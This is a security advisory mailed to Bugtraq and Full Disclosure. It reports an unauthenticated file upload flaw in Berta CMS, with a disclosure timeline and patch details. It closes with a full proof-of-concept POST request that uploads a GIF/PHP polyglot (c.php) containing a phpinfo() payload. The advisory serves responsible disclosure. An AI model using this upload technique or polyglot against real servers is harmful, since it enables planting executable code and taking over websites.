Insecure file upload in Berta CMS

From: Simon Waters <simon.waters@surevine.com>
To: bugtraq@securityfocus.com,fulldisclosure@seclists.org
Cc:
Subject: Insecure file upload in Berta CMS
Date:


Berta CMS is a web based content management system using PHP and local file storage.

http://www.berta.me/

Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought to our attention we checked the file upload functionality of this software.

We found that the file upload didn't require authentication.

Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions.

It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions.

http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ <http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/>

We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues.

The author was notified: 2015-03-22
Author Acknowledge: 2015-03-23
Patch released: 2015-03-26

The berta-0.8.10b.zip file from: http://www.berta.me/download/  includes a fix that requires authentication to upload files.


This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails).


The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers.

POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/upload.html
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802
Content-Length: 1617

-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="Filedata"; filename="c.php"
Content-Type: text/php

GIF89/* < ³ ÿÿÿfff\u0152\u0152\u0152333\u0152ÿÿ\u201e\u201e\u201e3ff\u0152\u0152ÿ\u0152ÿ\u0152\u201e\u201e\u0152f3f 33 f\u201e\u201e3 3 3!þ GIF SmartSaver Ver1.1a , \u02c6 < þ \u02c6I«½8ëÍ»ÿ`(Ždižhª®lë¾p,Ïtm\u0178x®ï|ïÿ\u20ac p¸ \u02c6¤r\u201e$ö\u0153 4ê¬Z¯\u2022 c\u2039íz¿`n { \u20ac\u017e 2-xLn»\u0178é³|\u017d`« ¼^O6\u20acãkp\u20ac\u0161\u2019\u20ac\u017e#jt\u2020]v)~`}g\u201a_\u20ac\u20ac\u20ac\u20ac\u20ac\u20ac\u20ac\u20ac\u20ac\u0153' _ 1\u0153Š\u20ac\u201c¤¥\u20ac\u0161¢\u201es\u20ac& ^ŸŽ¡a«¦´µ?¨©g³$­]¯ž± ¶\u0192\u201e<¸¹\u201aw X½\\u20ac\u02dc^»\u2026\u2019\u201c+\u2021\u02c6Ð,Í[\u201d%\u2021\u2018\u0153àá)\u2013\u0178\u2122\u2039â \u017eèëì'äeç M\u0152J êíøùöº x{{ üý P\u201a\u20ac\u016164 
ðVp\u0192@> 8P\u2019\u201e3 R±pOŸ\u2021 þ \u017eU8\u0153!@\u0153 (SbL9 a \u20ac\u0153š6Z8·° \u2030 03 )¡#\u02c6ŸøD \u2019÷òäµI ¬ qY RN\u20acD $½\u2020\u201a§O X\u2026        p §Qd\u20ac
P­s c\u0153® &\u20ac\u2122y5«\u203ai[\u201cF ð´\u20acR~ \u201eŽ%\u203a4 Z {·- Ðö­a[q¥\u017d\u20acP\u20ac\u201d\u2039]Yy o\u201e\u20ac\u017e-mc/*ål,|¸3©\u201e )\fðX\u0153d.L+\u2021\u20ac\u0153\u0192 \u20ach¾ 8{žM ôb\u2014'\u20ac\u20ac\u0161**GãE\u2019 Tï>\u02dcºgnã\u2030h+/d{·\u20ac\u2018\u2019¹FU;ñ9ë  \u20acXv} A/¬\u02dc \u20ac\u201d\u20ac \u201dü»u0\u2018å:g- \u0192ëôªxv-\u20ac\u20ac\u2122嬮²\u2021ë'R \u0153Wôº\u201eþ' f XC\u2026uý\u0153\u2020 ~áíç ý¹â\u017eqê        xÐ7\u017e}\u2018P{ ®ç \u2013\u20ac\u017e\u201dà\u2019$
¡/ (Ýz zQ\u0153Láá\u2022¡\u201a ý6\u20ac\u2020\u2030\u20ac¨c ':\u20ac\u0153â é)¶ w Ý <­H£A5å\u20ac\u0161£$;F\u2030£\u2019Júw Z    žŠ -\u2019$ ¡Iõ "Ob#å\u201e8ô¸Í \u0153e)a\u201evu@ä\u20ac\u201d \u20ac\u017e6f"pŠ æž5¨\u20acÐ XVù&r v     
3jy'ž\u20ac\u017eš\u2030ç£/øY \u20acB
h¤\u201c^ž f<\u20ac\u20ac\u2122FP\u20ac(n        %¤¤² )\u20acq
*{\j0§¦už *f;©ê£¨Ž\u20ac\u201cª«   § \u0161¦­k\u2019¥`ž\u20ac\u0161
k¢oZ\u201c ²¡þæ·ë³ ôzå¯ j9ë /º9*/<?php phpinfo(); ?>/*
`\u2021Ž´\u0152µ°U .±áBkî>#VëE\u20ac\u2122 ¦ªîª\u20ac Šj v«­ £í ¹å\u201cë/®¹¾\u20ac \u2020;h»6 D ·`°k0Š\u2021 H¡³ÿú\u20ac \u0192òN n \u201eñf/¹¤a÷±\u20ackF\u0153 \u20ac Wlî\u2026\u0160\u01604f c¶Q s´6 ¢\u2020z \u01601/R\u2021¯\u0160@Wpñ \u201e\u2030 ³&¸ ­\u2021]Aæ|ñ n± O ô\u2022 o+îi! \u20ac ¥!"\u20ac\u0153\u201c\u20ac"4õ ¥\u20ac\u201d2\u2013¤^ óX0w\u0160\u20acZ\u201e´F6\u2030 rÝu\u2013V³­²\u203a \u2019 ó\u201dzâ Hqw?|kà\u20ac\u0161ÿìw\u2026nóýU\u2020\u20ac\u2122k­øá\u20ace |ùŸ\u20ac£7šã [L%G\u20ac\u0161ãA©á}\u20ac\u20ac\u201cKu\u201e7¼éza q- k\u20acŽfä¬\u20ac·¯¯£Ž\u201dé² $nç \u20ack vº¶'o D(åá°<
éQ\u201a `£` q}F\u2122*ïý÷à\u20ac/þøä\u20ac\u201doþù觯þúì·ïþûð\u2021/ÿüô\u2014oÿýøç¯ÿþü÷ïÿÿ - ;

-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="submit"

Upload Image
-----------------------------2147563051636691175750543802--




Simon Waters

phone  +448454681066
email  simon.waters@surevine.com
skype  simon.waters.surevine


Participate | Collaborate | Innovate

Surevine Limited





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.